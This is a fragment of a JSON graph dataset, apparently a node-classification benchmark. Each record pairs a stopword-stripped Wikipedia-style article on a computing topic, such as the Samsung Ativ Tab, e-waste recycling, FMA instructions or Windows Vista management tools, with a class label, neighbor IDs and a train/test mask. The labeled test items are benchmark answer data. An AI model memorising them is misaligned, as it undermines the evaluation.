    "text": "Samsung_Ativ_Tab:samsung ativ tab samsung ativ tab tablet manufactured samsung ativ tab announced august 29 2012 ifa 2012 incorporates dual-core 1.2 ghz qualcomm snapdragon s4 processor runs windows rt operating system despite mixed reception windows rt operating system received comparison windows 8 ativ tab received positive reviews lightweight design ability use usb peripherals overall performance first generation windows rt device ativ tab released december 2012 united kingdom release germany united states cancelled due lukewarm reception unclear positioning windows rt design ativ tab relatively similar android-based counterparts galaxy note 10.1 built using mixture plastic glass micro hdmi port microsd slot full-size usb port incorporated design well volume rocker power button headphone jack located top physical windows button located directly screen charging port dock connector located bottom ativ tab uses ips display resolution 1366x768 tablet available either 32 gb 64 gb internal storage ativ tab originally scheduled release united kingdom november 2012 alongside windows phone 8 counterpart samsung ativ delayed mid-december release devices eventually held december 14 2012 january 2013 samsung announced cancelled american release ativ tab citing unclear positioning windows rt operating system modest demand windows rt devices plus effort investment required educate consumers differences windows 8 rt reasons move mike abary senior vice president samsung u.s. pc tablet businesses also stated company unable build ativ tab meet target price pointconsidering lower cost intended selling point windows rt devices samsung also reportedly planned pull ativ tab germany unspecified european markets similar reasons whilst demoing device ifa techradar praised ativ tab crisp screen lightweight design ability expand functionality storage usb port microsd card slot however also said processor relatively responsive certainly n't league galaxy note 2 anandtech said despite best substitute actual notebook due lagging performance arm-based processors rushed nature os ativ tab well executed first-generation windows rt device tablet relatively snappy performance battery life lightweight design regarded positive aspectsdespite considering design nothing particularly new exciting qualcomm apq8060a chipset used ativ tab also judged best processor windows rt far noting performance sufficient surprisingly competitive comparison chipsets used competing windows rt devices rear camera considered neither horrible great lack keyboard accessory dock connector also noted",
    "neighbors": [
      9863,
      1832,
      3304,
      5384,
      6797,
      7983,
      1776,
      4816,
      3605,
      1400,
      9913,
      10303
    ],
    "mask": "Test"
  },
  {
    "node_id": 9499,
    "label": 4,
    "text": "Computer_recycling:computer recycling computer recycling electronic recycling e-waste recycling disassembly separation components raw materials waste electronics although procedures re-use donation repair strictly recycling common sustainable ways dispose waste 2009 38 computers quarter total electronic waste recycled united states 5 3 3 years prior respectively since inception early 1990s devices recycled worldwide due increased awareness investment electronic recycling occurs primarily order recover valuable rare earth metals precious metals short supply well plastics metals resold used new devices purification effect creating circular economy however one also make use useful components dead computers may damaged beyond repair make use parts new computers may cover material costs another cheap way recycling homes working areas recycling considered environmentally friendly prevents hazardous waste including heavy metals carcinogens entering atmosphere landfill waterways electronics consist small fraction total waste generated far dangerous stringent legislation designed enforce encourage sustainable disposal appliances notable waste electrical electronic equipment directive european union united states national computer recycling act obsolete computers old electronics valuable sources secondary raw materials recycled otherwise devices source toxins carcinogens rapid technology change low initial cost planned obsolescence resulted fast-growing surplus computers electronic components around globe technical solutions available cases legal framework collection system logistics services need implemented applying technical solution u.s. environmental protection agency estimates 30 40 million surplus pcs classified hazardous household waste would ready end-of-life management next years u.s. national safety council estimates 75 personal computers ever sold surplus electronics 2007 united states environmental protection agency epa stated 63 million computers u.s. traded replacements discarded today 15 electronic devices equipment recycled united states electronic waste sent landfills incinerated releases materials lead mercury cadmium soil groundwater atmosphere thus negative impact environment many materials used computer hardware recovered recycling use future production reuse tin silicon iron aluminium variety plastics present bulk computers electronics reduce costs constructing new systems components frequently contain copper gold tantalum silver platinum palladium lead well valuable materials suitable reclamation computer components contain many toxic substances like dioxins polychlorinated biphenyls pcbs cadmium chromium radioactive isotopes mercury typical computer monitor may contain 6 lead weight much lead glass cathode ray tube crt typical 15 inch 38 cm computer monitor may contain lead monitors estimated lead circuit boards contain considerable quantities lead-tin solders likely leach groundwater create air pollution due incineration us landfills 40 lead content levels e-waste processing e.g incineration acid treatments required reclaim precious substances may release generate synthesize toxic byproducts export waste countries lower environmental standards major concern basel convention includes hazardous wastes limited crt screens item may exported transcontinentally without prior consent country exporting receiving waste companies may find cost-effective short term sell outdated computers less developed countries lax regulations commonly believed majority surplus laptops routed developing nations high value working reusable laptops computers components e.g ram help pay cost transportation many worthless commodities laws governing exportation waste electronics put place govern recycling companies developed countries ship waste third world countries however concerns impact e-recycling human health health recycling workers environmental degradation remain example due lack strict regulations developing countries sometimes workers smash old products propelling toxins ground contaminating soil putting wear shoes danger procedures include burning away wire insulation acid baths resell circuit boards methods pose environmental health hazards toxins released air acid bath residue enter water supply switzerland first electronic waste recycling system implemented 1991 beginning collection old refrigerators years electric electronic devices gradually added system established producer responsibility organization swico mainly handling information communication organization technology european union implemented similar system february 2003 waste electrical electronic equipment directive weee directive 2002/96/ec pan european adoption legislation slow take-up italy united kingdom final member states pass law success weee directive varied significantly state state collection rates varying 13 kilograms per capita per annum little 1 kg per capita per annum computers electronic wastes collected households within europe treated weee directive via producer compliance schemes whereby manufacturers electronics pay scheme funds recovery household waste recycling centres hwrcs nominated waste treatment facilities known obligated weee however recycling ex corporate computer hardware associated electronic equipment falls outside producer compliance scheme known non-obligated uk waste obsolete corporate related computer hardware treated via third party authorized treatment facilities normally impose charge collection treatment united states congress considers number electronic waste bills like national computer recycling act introduced congressman mike thompson d-ca main federal law governing solid waste resource conservation recovery act 1976 covers crts though state regulations may differ also separate laws concerning battery disposal march 25 2009 house science technology committee approved funding research reducing electronic waste mitigating environmental impact regarded sponsor ralph hall r-tx first federal bill directly address electronic waste many states introduced legislation concerning recycling reuse computers computer parts electronics american computer recycling legislations address within larger electronic waste issue 2001 arkansas enacted arkansas computer electronic solid waste management act requires state agencies manage sell surplus computer equipment establishes computer electronics recycling fund authorizes department environmental quality regulate and/or ban disposal computer electronic equipment arkansas landfills recently passed electronic device recycling research development act distributes grants universities government labs private industries research developing projects line e-waste recycling refurbishment japan sellers manufacturers certain electronics televisions air conditioners required recycle covered least two legislations law promotion effective utilization resources lpur law recycling specified kinds home appliances lrha former passed 2001 encouraged manufacturers voluntarily help recycle goods lrha adopted 2009 required recycling efforts consumers manufacturers home appliances however legislation exists cover recycling computer cellphone-related wastes required south korea taiwan sellers manufacturers electronics responsible recycling 75 used products south korea local governments introduced recycling initiatives case seoul launched specialized e-waste recycling program includes sr center recycling facility takes apart salvages materials fifth 10-ton e-waste city generates year according report unep titled recycling – e-waste resources amount e-waste produced – including mobile phones computers – could rise much 500 percent next decade countries india one theory increased regulation electronic waste concern environmental harm mature economies creates economic disincentive remove residues prior export critics trade used electronics maintain easy brokers calling recyclers export unscreened electronic waste developing countries china india parts africa thus avoiding expense removing items like bad cathode ray tubes processing expensive difficult developing countries becoming big dump yards e-waste proponents international trade point success fair trade programs industries cooperation led creation sustainable jobs bring affordable technology countries repair reuse rates higher organizations like a2z group stepped responsibility collect recycle e-waste various locations india thanks national environmental management act 1998 national environmental management waste act 2008 person position causing harm environment failing comply waste act could fined r10 million put jail receive penalties transgressions consumer recycling options consists see sale donating computers directly organizations need sending devices directly back original manufacturers getting components convenient recycler refurbisher rising price precious metals — coupled high rate unemployment great recession — led larger number amateur profit electronics recyclers computer parts example stripped valuable components sold scrap metals like copper aluminium lead gold palladium recovered computers televisions recycling process tvs monitors mobile phones computers typically tested reuse repaired broken may disassembled parts still high value labour cheap enough e-waste shredded roughly 100 mm pieces manually checked separate toxic batteries capacitors contain poisonous metals remaining pieces shredded ~10 mm passed magnet remove ferrous metals eddy current ejects non-ferrous metals sorted density either centrifuge vibrating plates precious metals dissolved acid sorted smelted ingots remaining glass plastic fractions separated density sold re-processors tvs monitors must manually disassembled remove either toxic lead crts mercury flat screens corporations face risks incompletely destroyed data improperly disposed computers uk recycling companies use specialized weee-registered contractor dispose equipment electrical appliances disposes safely legally america companies liable compliance regulations even recycling process outsourced resource conservation recovery act companies mitigate risks requiring waivers liability audit trails certificates data destruction signed confidentiality agreements random audits information security national association information destruction international trade association data destruction providers online auctions alternative consumers willing resell cash less fees complicated self-managed competitive environment paid listings might sell online classified ads similarly risky due forgery scams uncertainty researching computer companies computer purchase consumers find offer recycling services major computer manufacturers offer form recycling user request may mail old computers arrange pickup manufacturer hewlett-packard also offers free recycling one national recycling programs available nationally rather one two specific states hewlett-packard also offers pick computer product brand fee offer coupon purchase future computers components largest computer recycler america 2003 recycled electronic waste globally since 1995 encourages shared approach collection points consumers recyclers meet manufacturers often offer free replacement service purchasing new pc dell computers apple inc. take back old products one buys new one refurbish resell computers one-year warranty many companies purchase recycle brands working broken laptops notebook computers individuals corporations building market recycling desktop computers proven difficult exchange programs laptops smartphones smaller electronics basic business model provide seller instant online quote based laptop characteristics send shipping label prepaid box seller erase reformat process laptop pay rapidly cheque majority companies also generalized electronic waste recyclers well organizations recycle computers exclusively include cash laptops laptop refurbisher nevada claims first buy laptops online 2001 constant rising costs due inflation many families schools sufficient funds available computers utilized along education standards families also impacted disaster suffer well due financial impact situation incurred many nonprofit organizations interconnection.org found locally well around web give detailed descriptions methods used dissemination detailed instructions donate impact seen locally globally affecting thousands need canada non profit organizations engaged computer recycling electronic recycling association calgary edmonton vancouver winnipeg toronto montreal computers schools canada wide active collecting refurbishing computers laptops help non profit charitable sectors schools term junkyard computing colloquial expression using old inferior hardware fulfill computational tasks handling reliability availability software level utilizes abstraction computational resources via software allowing hardware replacement low effort ease replacement hereby corner point since hardware failures expected time due condition underlying infrastructure paradigm became widely used introduction cluster orchestration software like kubernetes apache mesos since large monolithic applications require reliability availability machine level whereas kind software fault tolerant design orchestration tools also introduced fairly fast set-up processes allowing use junkyard computing economically even making pattern applicable first place use cases introduced continuous delivery getting widely accepted infrastructure execute tests static code analysis needed requires much performance possible extremely cost effective economical technological perspective junkyard computing practicable small number users companies already requires decent number physical machines compensate hardware failures maintaining required reliability availability implies direct need matching underling infrastructure house computers servers scaling paradigm also quite limited due increasing importance factors like power efficiency maintenance efforts making kind computing perfect mid-sized applications although consumer electronics radio popular since 1920s recycling almost unheard early 1990s end 1970s accelerating pace domestic consumer electronics drastically shortened lifespan electronics tvs vcrs audio new innovations appeared quickly making older equipment considered obsolete increased complexity sophistication manufacture made local repair difficult retail market shifted gradually substantially high-value items cherished years repaired necessary short-lived items rapidly replaced owing wear simply fashion discarded rather repaired particularly evident computing highlighted moore law 1988 two severe incidents highlighted approaching e-waste crisis cargo barge khian sea loaded 14,000 tons toxic ash pennsylvania refused acceptance new jersey caribbean sailing 16 months waste dumped topsoil fertiliser haiti bay bengal november 1988 june 1988 large illegal toxic waste dump created italian company discovered led formation basel convention stem flow poisonous substances developed countries 1989 1991 first electronic waste recycling system implemented switzerland beginning collection old refrigerators gradually expanding cover devices organisation swico handles programme partnership retailers first publication report recycling computers electronic waste published front page new york times april 14 1993 columnist steve lohr detailed work advanced recovery inc. small recycler trying safely dismantle computers even waste landfilled several companies emerged early 1990s chiefly europe national 'take back laws compelled retailers use schemes set many countries capacity deal sheer quantity e-waste generated hazardous nature began export problem developing countries without enforced environmental legislation cheaper cost recycling computer monitors us ten times china demand asia electronic waste began grow scrap yards found could extract valuable substances copper iron silicon nickel gold recycling process waste electrical electronic equipment directive weee directive became european law february 2003 covers aspects recycling types appliance followed electronic waste recycling act enshrined californian law january 2005 2000s saw large increase sale electronic devices growth waste stream 2002 e-waste grew faster type waste eu caused investment modern automated facilities cope influx redundant appliances e-cycling e-waste initiative united states environmental protection agency epa refers donations reuse shredding general collection used electronics generically term refers process collecting brokering disassembling repairing recycling components metals contained used discarded electronic equipment otherwise known electronic waste e-waste e-cyclable items include limited televisions computers microwave ovens vacuum cleaners telephones cellular phones stereos vcrs dvds anything cord light takes kind battery investment e-cycling facilities increasing recently due technology ’ rapid rate obsolescence concern improper methods opportunities manufacturers influence secondary market used reused products higher metal prices also recycling taking place controversy around methods stems lack agreement preferred outcomes world markets lower disposable incomes consider 75 repair reuse valuable enough justify 25 disposal debate certification standards may leading better definitions though civil law contracts governing expected process still vital contracted process poorly defined e-cycling e-waste disposal occurring processing reuse repair equipment recovery metals may unethical illegal e-scrap many kinds transported overseas developing countries processing transported repaired and/or recycled processing less valuable e-scrap becomes e-waste/pollution another point view net environmental cost must compared include mining refining extraction waste pollution cost new products manufactured replace secondary products routinely destroyed wealthier nations economically repaired older obsolete products example negative impacts e-waste pollution groundwater become serious areas surrounding china ’ landfills water must shipped away however mining new metals even broader impacts groundwater either thorough e-cycling processing domestic processing overseas repair help environment avoiding pollution e-cycling theoretically sustainable alternative disposing e-waste landfills addition e-cycling allows reclamation potential conflict minerals like gold wolframite requires less mined lessens potential money flow militias exploitative actors third-world profit mining supporters one form required e-cycling legislation argue e-cycling saves taxpayers money financial responsibility would shifted taxpayer manufacturers advocates simple legislation landfill bans e-waste argue involving manufacturers reduce cost consumers reuse value lost resulting costs passed consumers new products particularly affecting markets hardly afford new products theorized manufacturers take part e-cycling would motivated use fewer materials production process create longer lasting products implement safer efficient recycling systems theory sharply disputed never demonstrated critics e-cycling vocal advocates according reason foundation e-cycling raises product waste management costs e-waste consumers limits innovation part high-tech companies also believe e-cycling facilities could unintentionally cause great harm environment critics claim e-waste ’ occupy significant portion total waste according european study 4 waste electronic another opposition e-cycling many problems posed disassembly process costly dangerous heavy metals electronic products composed little 1–5 original cost materials retrieved final problem people find identity fraud common regards disposal electronic products programs legislated creating winners losers among e-cyclers different locations processes may difficult distinguish criticism e-cycling practice criticism specific legislated means proposed enhance hefty criticism often lobbed reuse based recyclers people think recycling electronic waste reality actually exported developing countries like china india nigeria instance free recycling drives recyclers may staying true word selling e-waste overseas parts brokers studies indicate 50–80 300,000 400,000 tons 270,000 360,000 tonnes e-waste sent overseas approximately 2 million tons 1.8 million tonnes per year go u.s. landfills although possible circumstances best way e-cycle upcycle e-waste hand electronic products question generally manufactured repaired warranty nations anti-reuse recyclers depict primitive reuse-based e-recyclers believe fair-trade incentives export markets lead better results domestic shredding continued debate export-friendly e-cycling increased regulation practice european union debate regarding export e-waste resulted significant amendment weee directive january 2012 view significantly diminishing export weee untreated e-waste debate strasburg meps stated 53 million tonnes weee generated 2009 18 collected recycling remainder exported sent landfill amendment voted unanimous 95 representatives removed re-use repair refurbishmet aspect directive placed emphasis upon recycling recovery precious metals base metals changes went placing burden upon registered exporters prove used equipment leaving europe fit purpose currently pieces government legislation number grassroots efforts contributed growth e-cycling processes emphasize decreased exports increased reuse rates electronic waste recycling act passed california 2003 requires consumers pay extra fee certain types electronics collected money redistributed recycling companies qualified properly recycle products state legislates e-waste kind consumer fee states efforts focus producer responsibility laws waste disposal bans study shown per capita recovery greater one type legislated program e.g california versus ordinary waste disposal bans e.g massachusetts though recovery greatly increased states use either method september 2006 dell developed nation ’ first completely free recycling program furthering responsibilities manufacturers taking e-cycling manufacturers retailers best buy sony samsung also set recycling programs program accept televisions expensive used electronic item unpopular markets must deal televisions valuable computers cherry picked another step taken recyclers ’ pledge true stewardship sponsored computer takeback campaign signed numerous recyclers promising recycle responsibly grassroots efforts also played big part issue community organizations formed help responsibly recycle e-waste grassroots campaigns basel computer takeback campaign co-coordinated grassroots recycling network silicon valley toxics coalition study shown difference recycling methods pledge data available demonstrate difference management pledge non-pledge companies though assumed risk making false claims prevent pledge companies wrongly describing processes many people believe u.s. follow european union model regards management e-waste refers concept extended producer responsibility started sweden 1990 program directive forces manufacturers take responsibility e-cycling also demands manufacturers mandatory take-back places bans exporting e-waste developing countries british columbia 20 epr programs recycling regulation legislation stops e-waste put landfills recycles instead 80 programs canada 2013 another longer-term solution computers composed less dangerous products many people disagree data provided show people agree european model based agreement measured outcomes experience-based scientific method e-waste presents potential security threat individuals exporting countries hard drives properly erased computer disposed reopened exposing sensitive information credit card numbers private financial data account information records online transactions accessed willing individuals organized criminals ghana commonly search drives information use local scams government contracts discovered hard drives found agbogbloshie ghana multimillion-dollar agreements united states security institutions defense intelligence agency dia transportation security administration homeland security resurfaced agbogbloshie ways ensure hardware destroyed also private data hard drive customer data stolen lost misplaced contributes ever-growing number people affected identity theft cause corporations lose money image company holds secure data banks law firms pharmaceuticals credit corporations also risk company public image hurt could cause consumers use services could cost millions business losses positive public relation campaigns cost data breaches varies widely ranging 90 50,000 hipaa new hitech amendment came american recovery revitalization act 2009 per customer record depending whether breach “ low-profile ” “ high-profile ” company non-regulated highly regulated area banking medical institutions. ” also major backlash consumer data breach company supposed trusted protect private information organization consumer info file must law red flags clarification act 2010 written information protection policies procedures place serve combat mitigate detect vulnerable areas could result identity theft united states department defense published standard recyclers individuals may meet order satisfy hipaa requirements countries developed standards aimed businesses purpose ensuring security data contained 'confidential computer media nist 800-88 us standard data remenance hmg cesg is5 baseline enhanced uk government protocol data destruction national association information destruction naid international trade association companies providing information destruction services suppliers products equipment services destruction companies also eligible membership naid mission promote information destruction industry standards ethics member companies companies follow guidelines naid also meet federal epa local dep regulations typical process computer recycling aims securely destroy hard drives still recycling byproduct typical process effective computer recycling asset disposal information security alliance adisa publishes adisa asset disposal security standard covers phases e-waste disposal process collection transportation storage sanitization disposal facility also conducts periodic audits disposal vendors",
    "neighbors": [
      1056,
      3009,
      6658,
      10691,
      1477,
      8678,
      5384,
      11368,
      2282,
      11534,
      9086,
      403,
      2867,
      2773,
      7579,
      1083,
      6494,
      831
    ],
    "mask": "None"
  },
  {
    "node_id": 9500,
    "label": 3,
    "text": "FMA_instruction_set:fma instruction set fma instruction set extension 128 256-bit streaming simd extensions instructions x86 microprocessor instruction set perform fused multiply–add fma operations two variants fma3 fma4 instructions almost identical functionality compatible contain fused multiply–add fma instructions floating-point scalar simd operations fma3 instructions three operands fma4 ones four fma operation form round · b c round function performs rounding allow result fit within destination register many significant bits fit within destination four-operand form fma4 allows b c four different registers three-operand form fma3 requires register b c three-operand form makes code shorter hardware implementation slightly simpler four-operand form provides programming flexibility see xop instruction set discussion compatibility issues intel amd incompatibility intel fma3 amd fma4 due companies changing plans without coordinating coding details amd changed plans fma3 fma4 intel changed plans fma4 fma3 almost time history summarized follows different compilers provide different levels support fma4",
    "neighbors": [
      3586,
      9092,
      2821,
      1798,
      4491,
      4108,
      4237,
      5645,
      6924,
      9996,
      5649,
      7313,
      10383,
      6038,
      9111,
      9369,
      7963,
      2719,
      5883,
      2088,
      2094,
      9391,
      8120,
      8506,
      2237,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      1998,
      5326,
      977,
      2514,
      3537,
      2516,
      5844,
      9428,
      4603,
      7387,
      4444,
      8795,
      3294,
      2655,
      1119,
      1122,
      7783,
      1000,
      10985,
      4204,
      9964,
      5358,
      5871,
      8944,
      9582,
      499,
      1399,
      9976,
      4217,
      1915,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 9501,
    "label": 3,
    "text": "Rastan_(video_game):rastan video game released rastan outside japan fantasy-themed side-scrolling action game originally released arcades 1987 taito later ported various platforms player controls barbarian warrior embarked quest slay dragon way dragon lair rastan must fight hordes enemy monsters based mythical creatures chimeras harpies controls rastan consists eight-way joystick two buttons attacking jumping using joystick combination either buttons player determine height rastan jumps well direction swings weapon including downwards jumping game uses health gauge system along limited lives although certain obstacles falling body water crushed spiked ceiling instantly kill rastan regardless much health left total six rounds consisting three areas outdoor scene castle scene throne room player must confront stage boss backgrounds outdoor areas feature broad landscapes changing sunlight effects detail game bosses names according msx2 version order appearance consist player pick item touching well new weapons striking current one weapons power-ups picked rastan equipped limited time rastan picks equipable item icon appear lower right corner screen indicator item effect wears rastan wield one weapon time consists mace axe fireball-shooting sword addition standard sword well one type protector shield mantle body armor items necklace ring worn time also jewels gives bonus points well potion bottles restore deplete player health depending color rare golden sheep head restore rastan health completely used thief murderer otherwise could survive difficult times sit beside listen story days filled adventure succeeded obtaining consent princess ceim exchange dragon head kingdom treasures started quest dragon lair journey begun moment lose must hurry seem cursed dragon expected kill dragon situation getting serious afford die yet regret making promise late withdraw one still alive hang dragon come right away cut head obtaining princess treasures left kingdom ceim search country ruler part long story becoming king chance 'll tell adventurous stories rastan saga japanese version features opening sequence player starts game explains purpose rastan journey included export versions simply titled rastan also japanese version player completes stage round victory screen text pertaining storyline overseas versions generic victory screen generic text brave fighter cleared difficult stage. however overseas versions feature different attract sequence shows items obtained player along effect rastan saga far fewer bats bat swarm sequences castle level 1 rastan rastan initially ported various 8-bit home computers europe commodore 64 zx spectrum amstrad cpc imagine software 1987 zx spectrum version awarded 9/10 july 1988 issue sinclair placed number 54 sinclair top 100 list taito imported imagine c64 version united states releasing alongside two additional versions ibm pc apple iigs ported novalogic previously unreleased version atari st discovered demo form 1988 taito developed conversions msx2 japan master system north america europe ports featured redesigned level layouts master system version replacing boss characters well rastan released formation esrb one two known games sega master system feature frontal female nudity miracle warriors in-game sprites illustrations instruction manual depict several female enemy monsters topless fully nude version later ported game gear released exclusively japan august 9 1991 rastan saga emulation rastan arcade game included taito legends vol 1 released playstation 2 xbox windows pc 2006 game followed two sequels rastan saga ii also known two names nastar europe nastar warrior north america rastan also made appearance another taito game titled champion wrestler miracle rastan saffire corporation developed game barbarian released name warrior blade rastan vs. barbarian japan taito published game region game nothing rastan saga dispute title change game released playstation 2 also country get nintendo gamecube version release cancelled north america europe due poor sales indie game völgarr viking developed crazy viking studios windows os x linux xbox one dreamcast described kickstarter page based rastan",
    "neighbors": [
      8709,
      4043,
      8492,
      6797,
      10316,
      2159,
      1776,
      4690,
      6390,
      823,
      5275,
      1693,
      4894
    ],
    "mask": "None"
  },
  {
    "node_id": 9502,
    "label": 4,
    "text": "Commercial_Product_Assurance:commercial product assurance commercial product assurance cpa cesg approach gaining confidence security commercial products intended supplant approaches common criteria cc cct mark uk government use cpa developed auspices uk government cesg uk national technical authority nta information security cesg also produce architectural patterns cover good practices common business problems looks use cpa product current architectural patterns include comparison schemes",
    "neighbors": [
      8904,
      2122,
      4595
    ],
    "mask": "None"
  },
  {
    "node_id": 9503,
    "label": 1,
    "text": "Aria_(storage_engine):aria storage engine aria storage engine mariadb mysql relational database management systems goal make crash-safe alternative myisam yet transactional plans add proper support database transactions point future long-term goal aria default transactional non-transactional storage engine mariadb development since 2007 first announced michael monty widenius blog aria used internal temporary tables mariadb community-developed branch mysql database led widenius aria shipped mysql percona server included tokudb release mariadb maria project hosted launchpad aria initially named maria reference monty youngest child renamed aria 2010 avoid confusion main database developed mariadb aria maria without also pleasant musical term aria similar myisam purpose crash-safe alternative myisam aria support foreign keys currently transactions aria supports non-partitioned aria tables consist three physical files .frm file contains table definition file exists storage engines write data disk .mad file contains data .mai file contains indexes three table formats available aria tables page format available transactional tables fixed dynamic formats used myisam mainly implemented compatibility however myisam compressed format available aria order set table format one use row_format option create table alter table command",
    "neighbors": [
      11392,
      8195,
      10632,
      10258,
      10389,
      7453,
      1950,
      7339,
      9010,
      6721,
      5964,
      5198,
      7506,
      9687,
      10459,
      6245,
      7654,
      8295,
      8683,
      2413,
      7022,
      3188,
      4598,
      10873,
      2810
    ],
    "mask": "None"
  },
  {
    "node_id": 9504,
    "label": 4,
    "text": "Messaging_Layer_Security:messaging layer security messaging layer security mls security layer end-to-end encrypting messages groups size two many built ietf mls working group designed efficient practical secure security properties mls include message confidentiality message integrity authentication membership authentication asynchronicity forward secrecy post-compromise security scalability idea born 2016 first discussed unofficial meeting ietf 96 berlin attendees wire mozilla cisco initial ideas based pairwise encryption secure 1:1 group communication 2017 academic paper introducing asynchronous ratcheting trees published university oxford setting focus efficient encryption schemes first bof took place february 2018 ietf 101 london founding members mozilla facebook wire google twitter university oxford inria",
    "neighbors": [
      6834
    ],
    "mask": "Test"
  },
  {
    "node_id": 9505,
    "label": 2,
    "text": "Management_features_new_to_Windows_Vista:management features new windows vista windows vista contains range new technologies features intended help network administrators power users better manage systems notable changes include complete replacement windows setup process completely rewritten deployment mechanisms support per-application remote desktop sessions new diagnostic health monitoring tools range new group policy settings covering many features new windows vista areas interest include major changes task scheduler well addition subsystem unix applications provides posix-compatible environment applications part operating system setup process windows vista completely rewritten image-based setup based windows preinstallation environment winpe version 2.0 amongst features runs entire setup process graphical environment opposed text-based environments previous versions visually user interface resembles windows vista using cleartype fonts aero visual style enabling use mouse prior copying setup image users graphically resize partitions support loading third-party disk drivers improved whereas windows xp supported loading drivers floppy disks setup environment initially loading windows vista additionally supports loading drivers usb firewire storage devices cds dvds within main setup wizard microsoft aimed reduce amount time setup takes complete setup significantly faster windows xp thus windows vista installed little 20 minutes especially notable considering windows vista install three times size predecessor end setup process windows vista automatically downloads applies security device-driver updates windows update new windows recovery environment winre detects fixes startup related problems accessed pressing f8 startup system boots winre interface offers various tests well recovery failure detection tools winre automatically detects blue screen errors registry damage tries repair system get running quickly windows recovery environment tools significantly expanded take advantage new graphical setup environment toolbox presented user offering access repair functions system restore new memory diagnostic tool access complete pc backup restore images access command prompt multiple command prompts spawned command-line tools available command prompts spawned time setup pressing shift+f10 new diagnostic utility dubbed startup repair later automatic repair formerly system recovery troubleshooter wizard designed repair issues may negatively affect windows startup process damaged missing boot system files incompatible drivers issues result damaged hardware startup repair checks corruption operating system components boot configuration data disk file system metadata master boot record windows registry microsoft stated utility intended repair eighty percent issues package manager part windows vista servicing stack replaces previous package installer codice_1 update installer codice_2 microsoft delivers updates windows vista files resources package manager windows update control panel item turn windows features use windows vista servicing stack package manager also install updates offline windows image including updates boot-critical device drivers language packs windows vista introduced component-based servicing cbs architecture installation servicing deployment windows vista uses hardware-independent image windows imaging format wim image file contains necessary bits operating system contents copied target system system specific software device drivers applications installed configured afterwards reduces time taken installation windows vista corporations author image files using wim format might include applications organization wants deploy also multiple images kept single image file target multiple scenarios ability used microsoft include editions windows vista disc install proper version based provided product key addition initial configuration locale settings account names etc supplied xml answer files automate installation microsoft provides tool called imagex support creation custom images edit images created also used generate image running installation including data applications backup purposes wim images also controlled using windows system image manager used edit images create xml answer files unattended installations sysprep also included part windows vista hal-independent also included windows vista improved version files settings transfer wizard known windows easy transfer allows settings inherited previous installations user state migration tool allows migrating user accounts large automated deployments clickonce deployment technology smart client applications enables self-updating windows-based applications installed run minimal user interaction fashion require administrator access activex installer service optional component included business enterprise ultimate editions provides method network administrators domain authorize installation upgrade specific activex controls operating standard user activex components listed group policy installed without user account control consent dialog displayed windows vista includes number self-diagnostic features help identify various problems possible suggest corrective actions event logging subsystem windows vista also completely overhauled rewritten around xml allow applications precisely log events event viewer also rewritten take advantage new features large number different types event logs monitored including administrative operational analytic debug log types instance selecting application logs node scope pane reveals numerous new subcategorized event logs including many labeled diagnostic logs event logs configured automatically forwarded systems running windows vista windows server 2008 event logs also remotely viewed computers multiple event logs centrally logged managed single computer event logs filtered one criteria custom views created one events categorizing advanced filtering allows viewing logs related certain subsystem issue certain component events also directly associated tasks via redesigned event viewer windows error reporting improved significantly windows vista importantly new set public apis created reporting failures application crashes hangs developers create custom reports customize reporting user interface new apis documented msdn architecture windows error reporting revamped focus reliability user experience wer report errors even process bad state example process encountered stack exhaustions peb/teb corruptions heap corruptions etc windows xp process terminated silently without generating error report conditions new feature called problem reports solutions also added control panel applet keeps record system application errors issues well presents probable solutions problems remote desktop protocol 6.0 incorporates support application-level remoting improved security tls 1.0 support connections via ssl gateway improved remoting devices support .net remoting including support remoting windows presentation foundation applications wmi scripting 32-bit color support dual-monitor support network level authentication remote assistance helps troubleshooting remotely full-fledged standalone application use help support center windows messenger based windows desktop sharing api two administrators connect remote computer simultaneously also session automatically reconnects restarting computer also supports session pausing built-in diagnostics xml-based logging reworked use less bandwidth low-speed connections nat traversals also supported session established even user behind nat device remote assistance configurable using group policy supports command-line switches custom shortcuts deployed windows vista also includes windows remote management winrm microsoft ’ implementation ws-management standard allows remote computers easily managed soap-based web service winrm allows obtaining data including wmi management information local remote computers running windows xp windows server 2003 winrm installed computers windows server 2008 ws-management protocol implementations operating systems using winrm scripting objects along compatible command-line tools winrm winrs allows administrators remotely run management scripts winrm session authenticated minimize security risks windows vista includes microsoft management console 3.0 mmc introduced several enhancements including support writing .net snap-ins using windows forms running multiple tasks parallel addition snap-ins present ui different thread operation runs thus keeping snap-in responsive even computationally intensive task new mmc interface includes support better graphics well featuring task pane shows actions available snap-in selected task scheduler windows firewall also thoroughly configurable management console print management enables centralized installation management printers organization allows installation network-attached printers group clients simultaneously provides continually updated status information printers print servers also supports finding printers needing operator attention filtering display printers based error conditions out-of-paper also send e-mail notifications run scripts printer encounters error condition windows vista includes around 2400 group policy settings allow administrators specify configuration connected groups computers especially domain windows vista supports multiple local group policy objects allows setting different levels local group policy individual users new xml based policy definition file format known admx introduced admx files contain configuration settings individual group policy objects gpo domain based gpos admx files centrally stored computers domain retrieve configure using file replication service used replicate files configured system remote location group policy service longer attached winlogon service rather runs service group policy event messages logged system event log group policy uses network location awareness refresh policy configuration soon network configuration change detected new categories policy settings include power management device installations security settings internet explorer settings printer settings among others group policy settings also need used enable two way communication filtering windows firewall default enables incoming data filtering printer settings used install printers based network location whenever user connects different network available printers updated new network group policy settings specify printer available network also printer settings used allow standard users install printers group policy also used specifying quality service qos settings device installation settings used prevent users connecting external storage devices means prevent data theft windows vista improves folder redirection introducing ability independently redirect 10 user profile sub-folders network location windows xp application data desktop documents pictures start menu folders redirected file server also management console snap-in windows vista allow users configure folder redirection clients running windows vista windows xp windows 2000 redesigned task scheduler based management console used automate management configuration tasks already number preconfigured system-level tasks scheduled run various times addition time-based triggers task scheduler also supports calendar event-based triggers starting task particular event logged event log even multiple events occurred also several tasks triggered event configured run either simultaneously pre-determined chained sequence series actions instead create multiple scheduled tasks tasks also configured run based system status idle pre-configured amount time startup logoff specified time tasks triggered xpath expression filtering events windows event log tasks also delayed specified time triggering event occurred repeat event occurs actions need done task fails also configured several actions defined across various categories applications components task scheduler keeps history log execution details tasks features task scheduler include several new command-line tools included windows vista several existing tools also updated tools windows resource kit built-in operating system services unix renamed subsystem unix-based applications included enterprise ultimate editions windows vista network file system nfsv3 client support also included however utilities sdk required downloaded separately also server components sfu product line namely server nfs user name mapping server nis password synchronization etc included windows vista supports scripting automation capabilities using windows powershell object-oriented command-line shell released microsoft included operating system also wmi classes expose controllable features operating system 